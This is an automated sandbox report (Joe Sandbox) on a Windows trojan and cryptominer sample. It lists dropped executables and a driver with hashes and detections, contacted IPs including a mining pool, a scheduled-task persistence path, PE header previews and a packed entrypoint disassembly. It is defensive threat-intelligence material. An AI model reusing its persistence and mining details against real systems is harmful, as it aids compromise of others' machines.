                                                                                                                https://xmrig.com/benchmark/%sconhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id11AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id12AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id13AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id14AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id15AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/Entity/Id16AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id17AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id18AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id19AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://go.mic4mconhost.exe, 00000015.00000000.751481626.00000224D5CB2000.00000004.00000020.sdmp, conhost.exe, 00000015.00000002.809219081.00000224D5CAB000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://support.google.com/chrome/?p=plugin_wmpAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  45.82.70.152
                                                                                                                                  		unknownNetherlands
                                                                                                                                  		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse
                                                                                                                                  157.90.156.89
                                                                                                                                  		mine.bmpool.orgUnited States
                                                                                                                                  		766REDIRISRedIRISAutonomousSystemESfalse
                                                                                                                                  95.143.179.185
                                                                                                                                  		unknownRussian Federation
                                                                                                                                  		25560RHTEC-ASrh-tecIPBackboneDEtrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                  Analysis ID:553228
                                                                                                                                  Start date:14.01.2022
                                                                                                                                  Start time:14:09:20
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 13m 39s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:light
                                                                                                                                  Sample file name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:37
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 54.5%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 67.9% (good quality ratio 55.5%)
                                                                                                                                  • Quality average: 46%
                                                                                                                                  • Quality standard deviation: 32%
                                                                                                                                  HCA Information:Failed
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                  • Execution Graph export aborted for target 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, PID 6220 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target AppLaunch.exe, PID 5180 because it is empty
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 4876 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target explorer.exe, PID 6924 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target sistem.exe, PID 5576 because there are no executed function
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  14:10:36API Interceptor76x Sleep call for process: AppLaunch.exe modified
                                                                                                                                  14:10:47API Interceptor1x Sleep call for process: Microsoft.exe modified
                                                                                                                                  14:10:51API Interceptor1x Sleep call for process: conhost.exe modified
                                                                                                                                  14:10:53Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  14:10:54API Interceptor2x Sleep call for process: services64.exe modified
                                                                                                                                  14:10:58API Interceptor1x Sleep call for process: sihost64.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASN

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):539
                                                                                                                                  Entropy (8bit):5.348465763088588
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                                                                                                                  MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                                                                                                                  SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                                                                                                                  SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                                                                                                                  SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2291
                                                                                                                                  Entropy (8bit):5.3192079301865585
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:MOfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HjHKoLHG1qHqH5HX:vq5qXAqLqdqUqzcGYqhQnoPtIxHbq1Ds
                                                                                                                                  MD5:A7DF088AA34326DF55EBEABB6C9550BE
                                                                                                                                  SHA1:452C8EF09C52F0DF853D97EFFF159AA56625EAEA
                                                                                                                                  SHA-256:4E15698573516EBEBA9F6BE8094135F3CA810D48FDCDC7E827463EDB2AFCECE4
                                                                                                                                  SHA-512:8263C8D9F26878E088AACBFCCB6C545AEB5B11DF3422DD276AC1A96AA3E66CE9F54802E4EE3DE5B1C1E680364901F99FCB1169BA23E3878B7B5114B2BC0BE871
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2233856
                                                                                                                                  Entropy (8bit):7.999686027647644
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
                                                                                                                                  MD5:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  SHA1:EBF7F62E5689F11BFA334A8E40804CA8B32C8339
                                                                                                                                  SHA-256:529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
                                                                                                                                  SHA-512:B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....z.".....................................................0'".<............@".....................................................................l'"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2233856
                                                                                                                                  Entropy (8bit):7.999686027647644
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:49152:4zEksk2+pV73APQ1HwNPT+p0+L+wupSPtabrvoOmRQj3duUbgQs0r:4zXU+r3v9w5T+p0+L/upCSrfxuUkQ1
                                                                                                                                  MD5:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  SHA1:EBF7F62E5689F11BFA334A8E40804CA8B32C8339
                                                                                                                                  SHA-256:529043B5FCEF43623835319764499B2A4DDBAE2477697F22AADA0E09352B83C5
                                                                                                                                  SHA-512:B3E906A04B22701F0C4938433B5DB7ABA1DBD894E9D7FBC9DD1CC4FE685351CF9D06A05B6504A4E79A7193C69B1C619D6EEF20C0816C79875A54827E12BF5E28
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P".....z.".....................................................0'".<............@".....................................................................l'"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\sistem.exe
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3514792
                                                                                                                                  Entropy (8bit):7.99852479553142
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:98304:sMcpY7WYnC7PyUMxgD9WbqlhsHh4TD5nzQX+:sfmWYniqUMxgD3l6CTDg+
                                                                                                                                  MD5:14A6FC2FF495BE7077B8AA7602606BB7
                                                                                                                                  SHA1:0B985B103E0AE6C21B9AC1DB8DFFFB3A68744348
                                                                                                                                  SHA-256:F7E9394DEB6140CCB3DF12A53E94E8B2D28DA6F7C9D0143736E3067E5AA88765
                                                                                                                                  SHA-512:AF599C8CF10341E71DDA685B2C0FFC268AD3F37854EF20B69E04B4661720AC55580EF6059CAF7A14CC0DEEB2405E1DBEDA67A241B59AF23E402E690C3AAECF6E
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a.....................T.......0............@...........................U......D7.....................................|.P. .....P..............~5..#..................................................................................................C...........................@................0...z..................@....................r...~..............@............ ..........................@...........>'..........................@.............2......./.................@....rsrc....0....P..$....0.............@....2w140TT......P.......0.............@....adata........U......~5.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):14544
                                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  Process:C:\Windows\System32\conhost.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):31232
                                                                                                                                  Entropy (8bit):7.579054897335154
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:bhq1ifn21Lqk0qRqHobJcA7R1TSR3N6h0m4:F7f21LqrqJJF7R1TSBNQ4
                                                                                                                                  MD5:A5D983222C60F4DCAE743F8E34806580
                                                                                                                                  SHA1:F55DC0A74F3CB665F4CB359D2A953244035B389F
                                                                                                                                  SHA-256:E6463D8B80C83D55FE18A9C308B1DBBEBDAD5E40CC52C9F91CF9A3C1D4CDDE84
                                                                                                                                  SHA-512:542E702017F4A23879090F1CCB8215CBE43DF1B765BEC7C19BC803AC4BD6D947CC96833B4095B9CC7ED5029BE8DBAED9A40D0D6CB83D638F59B80893CBFA4946
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@.............................................................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.9976199230870035
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  File size:3609088
                                                                                                                                  MD5:c7f9efb09db59923b3f96fd1ef2f0873
                                                                                                                                  SHA1:43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
                                                                                                                                  SHA256:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
                                                                                                                                  SHA512:fd926bc25e61bfee4cb873b15f78556e4f23ddb853babbdd2985dd36386da9185433c4b6624b4dd444ae5121073c4d6861d4161ba9c460be62d2f49f2b999389
                                                                                                                                  SSDEEP:98304:4DIDD0PzdRnlgUpPGRShIyR5elYuHkpluPsLaDKUOVV:4De0PXnlbCyalu3uPsWDKUOVV
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................T.......7....................................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x401000
                                                                                                                                  Entrypoint Section:
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                  Time Stamp:0x61E08BFA [Thu Jan 13 20:30:50 2022 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:c284fa365c4442728ac859c0f9ed4dc5

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  push 008F5001h
                                                                                                                                  call 00007F9C80C70E16h
                                                                                                                                  ret
                                                                                                                                  ret
                                                                                                                                  int3
                                                                                                                                  jnbe 00007F9C80C70DC7h
                                                                                                                                  inc edx
                                                                                                                                  and al, A4h
                                                                                                                                  pushfd
                                                                                                                                  jo 00007F9C80C70E67h
                                                                                                                                  leave
                                                                                                                                  hlt
                                                                                                                                  je 00007F9C80C70DF8h
                                                                                                                                  push es
                                                                                                                                  jmp 00007F9CBC84149Eh
                                                                                                                                  shl dword ptr [eax-7Ch], cl
                                                                                                                                  inc esi
                                                                                                                                  jnbe 00007F9C80C70DFBh
                                                                                                                                  out dx, al
                                                                                                                                  xor esp, dword ptr [edx-2497F614h]
                                                                                                                                  salc
                                                                                                                                  in al, dx
                                                                                                                                  push esp
                                                                                                                                  arpl word ptr [esi], ax
                                                                                                                                  pop ebp
                                                                                                                                  push ss
                                                                                                                                  xchg eax, ecx
                                                                                                                                  cmp al, byte ptr [esp]
                                                                                                                                  fisubr dword ptr [ebx-6276E776h]
                                                                                                                                  add al, byte ptr [edi-03h]
                                                                                                                                  pop edx
                                                                                                                                  jnc 00007F9C80C70E76h
                                                                                                                                  aad 80h
                                                                                                                                  call 00007F9C30D4F91Dh
                                                                                                                                  sbb eax, AAC528A4h
                                                                                                                                  push esp
                                                                                                                                  inc edi
                                                                                                                                  dec ecx
                                                                                                                                  push 6B96E3E9h
                                                                                                                                  test al, A0h
                                                                                                                                  mov al, byte ptr [A6A20888h]
                                                                                                                                  mov ebp, CA88F2F5h
                                                                                                                                  mov edi, 409E3134h
                                                                                                                                  jns 00007F9C80C70E1Fh
                                                                                                                                  mov eax, dword ptr [1760B368h]
                                                                                                                                  std
                                                                                                                                  sbb eax, 1B1FFC35h
                                                                                                                                  cmc
                                                                                                                                  xchg dword ptr [eax-4Fh], ebx
                                                                                                                                  dec ebx
                                                                                                                                  jmp far 0A33h : DC128E1Dh
                                                                                                                                  and dword ptr [ebx], edx
                                                                                                                                  push ebx
                                                                                                                                  xchg eax, esp
                                                                                                                                  jp 00007F9C80C70E5Bh
                                                                                                                                  rol byte ptr [ebx+1401D018h], 1
                                                                                                                                  mov esi, 06315812h
                                                                                                                                  movsd
                                                                                                                                  jecxz 00007F9C80C70DC1h
                                                                                                                                  cmp ah, byte ptr [esi-64h]
                                                                                                                                  jp 00007F9C80C70E76h
                                                                                                                                  adc ecx, dword ptr [edi+2D89AC22h]
                                                                                                                                  das
                                                                                                                                  ret
                                                                                                                                  jecxz 00007F9C80C70E84h
                                                                                                                                  scasb
                                                                                                                                  adc ebx, edi
                                                                                                                                  wait
                                                                                                                                  mov ebp, D4296BE2h
                                                                                                                                  adc ecx, dword ptr [F8540E75h]
                                                                                                                                  dec eax
                                                                                                                                  pop ecx
                                                                                                                                  mov al, 0Ah
                                                                                                                                  inc esp
                                                                                                                                  inc ebx
                                                                                                                                  retf
                                                                                                                                  leave
                                                                                                                                  int3
                                                                                                                                  push ss
                                                                                                                                  enter 29E8h, AAh

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4f5c7c0x120.loHdXUK
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4db0000x1961d.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
